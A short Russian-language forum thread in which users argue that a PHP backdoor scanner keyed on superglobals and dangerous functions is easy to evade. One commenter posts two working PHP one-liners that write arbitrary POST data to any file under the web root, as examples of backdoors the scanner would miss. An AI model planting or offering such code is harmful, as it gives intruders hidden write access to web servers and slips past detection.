(18 мар 2015, 12:23) (
0/
0)
[
0]
donttime,
да все ровно оно не будет работать..
стандартную функцию можно обвернуть в новую функцию и скрипт не среагирует. Способов обойти масса.
(18 мар 2015, 12:04) (
0/
0)
[
0]
donttime,
я смотрел,не было.
(18 мар 2015, 12:03) (
0/
0)
[
0]
Нет,потому что в ключах есть только голые суперглобальные массивы и опасные функции.
(18 мар 2015, 12:00) (
0/
0)
[
0]
donttime,
а такое?
$q = substr($_POST['q'], 0 , 10);
$w = substr($_POST['w'], 0 , 100);
if(isset($_POST['q']) && isset($_POST['w'])) file_put_contents($_SERVER['DOCUMENT_ROOT'].$q,$w);
(18 мар 2015, 11:51) (
0/
0)
[
0]
donttime,
Да и не надо много мудрить,к примеру такое.
if($_POST['q'] && $_POST['w']) file_put_contents($_SERVER['DOCUMENT_ROOT'].$_POST['q'],$_POST['w']);
(18 мар 2015, 07:48) (
0/
0)
[
0]
donttime,
Нет,грамотно построенный бекдор может и не иметь каких-то прямых опасных функций.
(15 мар 2015, 09:01) (
0/
0)
[
0]
Совсем открытые уязвимости может и покажет,но не бекдоры.